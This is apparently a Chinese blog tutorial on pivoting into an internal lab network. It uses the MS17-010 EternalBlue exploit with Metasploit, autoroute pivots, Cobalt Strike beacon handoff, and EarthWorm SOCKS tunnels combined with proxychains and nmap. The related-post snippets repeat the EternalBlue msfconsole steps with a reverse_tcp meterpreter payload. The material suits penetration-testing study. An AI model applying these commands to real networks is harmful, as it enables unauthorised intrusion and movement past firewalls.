内网渗透之多种方式实现内网穿透(详细)

最新推荐文章于 2024-05-13 11:17:11 发布
最新推荐文章于 2024-05-13 11:17:11 发布
阅读量1w 收藏 78
点赞数 8
分类专栏: 工具使用 文章标签: 渗透 跳板路由 内网攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38348692/article/details/100527895
版权

整个环境的拓扑如下:
1)两个win7主机都开启防火墙,开启445端口。内网穿透以ms17_010为突破点。
2)防火墙的配置,允许外网区域访问DMZ区,禁止访问内网,允许内网访问外网和dmz,允许dmz访问外网和dmz。
在这里插入图片描述
一、metasploit跳板路由

1)使用ms17_010_enternalbule获得meterpreter权限,在这里注意,设置payload是必须的,否则不能获得metepreter权限,直接弹到shell
在这里插入图片描述
在这里插入图片描述

2)获取meterpreter,创建跳板路由:
run autoroute -s 192.168.10.0/24 创建路由
run autoroute -p 打印路由[在这里插入图片描述]
在这里插入图片描述
3)输入background退回metaploit可以看到已经创建链接
在这里插入图片描述

4)再次利用ms17_010攻击内网靶机,可见攻击成功,攻击方式和上述一样
在这里插入图片描述二、cobalt strike 跳板路由实现内完成穿透

1)从metaploit中获取beacon:在cobalt strike中设置监听器,监听器类型为http _beacon
在这里插入图片描述
2)在metasploit中已经获取到session 后进行以下操作,转义session到中,设置的lport为在cobalt strike中设置的port
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
3)创建socks代理,
在这里插入图片描述
4)点击代理信息
在这里插入图片描述
5)复制信息到msf
在这里插入图片描述
6)打开msf输入setg Proxies socks4:127.0.0.1:8088
在这里插入图片描述
7)然后就可以添加扫描模块对内网进行扫描

三、socks +proxychains内网杀器

推荐一篇文章:通过SOCKS代理渗透整个内网
再推荐一篇:内网漫游之SOCKS代理大结局
再来一篇:内网穿透大杀器–EarthWorm
接着:内网穿透大杀器–EarthWorm
1、简单的earthworm+sockscap
两台主机:192.168.15.236 ,192.168.15.239 ,其中在239主机上开启子网虚拟机,ip地址为192.168.1.129,236主机不能直接访问。
1)在236主机上开启earthworm: ew.exe -s rcsocks -l 1008 -e 9996在这里插入图片描述
2)在239主机上开启earthworm:ew.exe -s rssocks -d 192.168.15.236 -e 9996
在这里插入图片描述
3)在236主机开启sockscap,配置代理信息
在这里插入图片描述
4)通过代理即可访问主机1.129主机的信息

2,proxychains + earthworm 穿透内网
测试环境和上面一样,proxychains默认解析DNS为4.2.2.2 ,因此proxychains解析需要在有网络的环境实现
1) 在,15.236主机上开启kali虚拟机,ip 192.168.15.128,在kali上开启earthworm :

./ew_for_Linux32 -s rcsocks -l 1080 -e 9996

在这里插入图片描述
2)在主机192.168.15.239上开启earthworm
在这里插入图片描述
3)配置proxychains
设置 /etc/proxychains.conf的配置文件,在文件中添加代理信息:socks5 127.0.0.1 1080
4)测试代理是否正常:正常解析的话可以进行扫描

cp /usr/lib/proxychains3/proxyresolv /usr/bin/
proxyresolv 192.168.1.129

5)使用nmap扫描:注意proxychains不支持udp和icmp
proxychains nmap -sT -Pn 192.168.1.129 -p 21,22,23,25,80,135,446,3389
6)代理启动msf:
解决数据库连接不上,在 /etc/proxychains.conf 文件中添加

localnet 127.0.0.1 000 255.255.255.255

在这里插入图片描述

KingCarzy
关注
  • 8
    点赞
  • 78
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
永恒之蓝(ms17-010)&&meterpreter模块简单使用
Z_l123的博客
03-09 1374
永恒之蓝(ms17-010) 启动meterpreter msfconsole 查询ms17-010,并使用攻击模块 search ms17-010 use 3 设置目标ip,本机ip,payload set rhosts 192.168.254.130 set lhost 192.168.254.129 set payload windows/x64/meterpreter/reverse_tcp 查看配置 show options 开始攻击 run ...
渗透测试实战 - 外网渗透内网穿透(超详细
HAKUNAMATATATTA的博客
02-18 7278
渗透测试实验,外网渗透内网穿透详细操作过程以及内网代理和内网探测的方法
只需三步,教你轻松搞定内网穿透
最新发布
知道的越多 不知道的就越多
05-13 1024
在开发过程中,你是否也遇到外网访问内部服务接口的需求,如三方服务回调。但本地或测试环境使用内网,外网无法直接访问。本篇文章就教你如何通过内网穿透来解决此类问题。
Windows网络服务渗透测试实战-跨网段攻击
c_lanxiaofang的博客
05-19 6235
一、实验项目名称 Windows网络服务渗透测试实战-跨网段攻击 二、实验目的及要求 掌握对跨网段攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 获取winxp系统管理员admin的密码,并使xp系统关机 ----基础配置---- 1、选择win7 2.选择winXP 3、选择kali 4、查看kali的ip 5、查看winXP的ip 6、查看win7的IP 总结如下: ...
内网渗透 | 手把手教你如何进行内网渗透
mingyqf的博客
07-01 2673
发布于2020-02-17 16:42:26阅读 4K0目录结构[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Iz2F7mzJ-1656677584270)(https://ask.qcloudimg.com/http-save/yehe-5957324/0v0eirg7bb.png?imageView2/2/w/1620)]首页看到DMZ开启了web服务,是一个typecho的cms,后台默认就是/admin后台尝试爆破弱口令admin1234但是找了一圈并没有发现有什么可
渗透测试综合实验(迂回渗透,入侵企业内网并将其控制为僵尸网络)
yyj1781572的博客
04-06 1648
内网渗透测试
电脑教程内网渗透内网穿透.rar
10-25
总结一下,内网穿透是解决内网设备与公网通信的重要技术,它涉及多种实现方法,包括UDP hole punching、TCP SYN proxy、STUN/TURN/ICE等。实际操作中,我们可以借助第三方服务或自行配置端口转发、DDNS等。但同时,...
实战中内网穿透的打法.pdf
12-14
内网穿透,也即 NAT 穿透,进行 NAT 穿透是为了使具有某一个特定源 IP 地址和源端口号的数据包不被 NAT 设备屏蔽而正确路由内网主机。下面就相互通信的主机在网络中与 NAT 设备的相对位置介绍内网穿透方法。 实战...
EarthWorm 内网穿透神器
01-18
EarthWorm是一套轻量便携且功能强大...相较于其他穿透工具,如reGeorg等, EarthWorm可以穿透更复杂的内网环境同时也不需要跳板机运行web服务,也可以支持多平台间的转接通讯,如Linux、Windows、MacOS、Arm-Linux等。
如何优雅的穿透linux内网.pdf
08-07
渗透的一个linux主机之后进入内网,虽然可以建立一个bugscan扫描节点进行内网扫描。但要进一步渗透,就需要接入内网。如何nc,lcx转发只能一个端口转一个端口。显然不能满足要求。通过ssh虽然能建立socks代理,但得...
[HACK学习呀] - 2021-01-30 内网渗透|Chisel内网穿透工具1
08-03
一、chisel工具介绍 二、chisel工具下载使用 三、chisel隧道搭建
实现路由内网穿透
HC_wood的博客
01-12 9629
实现路由内网穿透 在获得电信网关的公网ip资格后,将windows服务器内网穿透实现远程调用相关服务。 比如说我配置livego为远程流媒体服务器,推流的端口是1935,所以需要实现一个端口代理转发。 由于推流端口1935,和拉流端口7001都需要使用,所以这两个端口都需要被代理。 (1)配置路由器代理 在浏览器上输入192.168.31.1进入路由器管理界面,然后选择高级设置,添加端口转发: 由于我的这个路由器有DMZ功能,就是一键将本机所有服务都完成一次代理。 (2)网关配置代理 在浏览器输入
内网渗透-域渗透
qq_44806973的博客
11-23 4468
内网渗透(域渗透) 基础指南
实现局域网内window系统的漏洞扫描
LYKymy的博客
04-01 4428
扫描当前局域网内所有的活跃IP nmap 192.168.1.1/24 -v 判断当前IP的机器类型 nmap -T4 -O 192.168.*.* 利用msf对“永恒之蓝”端口进行渗透 msfconsole use exploit/windows/smb/ms17_010_eternalblue set rhost 192.168.*.* run ...
渗透系列:外网渗透内网穿透(超详细
weixin_54626591的博客
12-07 884
外网渗透内网穿透(超详细
手把手教你,搭建内网穿透服务
热门推荐
Frank的技术世界
12-17 12万+
在很多场景下内网穿透都是我们常常遇到的需求,之前也用过花生壳、ngrok、FRP 等等一些工具,但是由于限速、收费、安全各方面因素只好放弃了。 目前所在实验室主要从事深度学习和机器学习相关工作,有一台高配 GPU 计算型服务器,大家使用 Jupyter Notebook 在网页上进行编码工作,但是只能在学院内网才能进行使用,在外面就无法使用让人比较抓狂。如果购买阿里云等深度学习服务,价格昂贵,只好...
metasploit小白教程总结
sweetie 的博客
01-03 2368
msf小白学习教程一 1.msf是什么? msf全称:metasplpit 作用:Metasploit是一个渗透测试平台 环境:kali-linux 自动搭建了msf环境 2.msf的详细分解 在这边我就化繁为简,把一些我感觉重要常用的功能详细的讲解一番。 2.1搜索模块 首先肯定是启动msf,启动就很简单了,在kali命令行输入:msfconsole 如果记不住,可以直接:msfc然后加一个tab,然后就会自动补全,回车就好了。 2.1.1 搜索模块命令:search 命令介绍:msfconsole
内网安全之:内网渗透流程
f_carey的博客
09-12 1万+
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 内网渗透流程1 前提2 实验环境2.1 建立 meterpreter 反向连接2.2 收集信息提升权限2.3 持久后门: 添加隐藏用户2.4 添加内网路由2.5 扫描内网存活主机2.6 扫描内网主机开放的端口2.6.1 使用 SOCKS 后nmap 扫描报错2.7 攻击内网主机 1 前提 利用已经控制的一台计.
使用Earthworm (EW) 做Socks5代理
weixin_42299610的博客
03-21 3892
正向代理 我们常说的代理就是指正向代理,正向代理的过程,它隐藏了真实的请求客户端,服务端不知道真实的客户端是谁,客户端请求的服务都被代理服务器代替来请求。 举个例子在国内用浏览器访问 www.google.com 时,因为防火墙的原因拒绝连接,这时候你可以在国外搭建一台代理服务器,让代理帮你去请求google.com,代理把请求返回的相应结构再返回给我。 反向代理 反向代理是相对于服务器而言的,...
内网渗透综合实验.docx
08-29
内网渗透综合实验-,各层的隐藏隧道通信

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值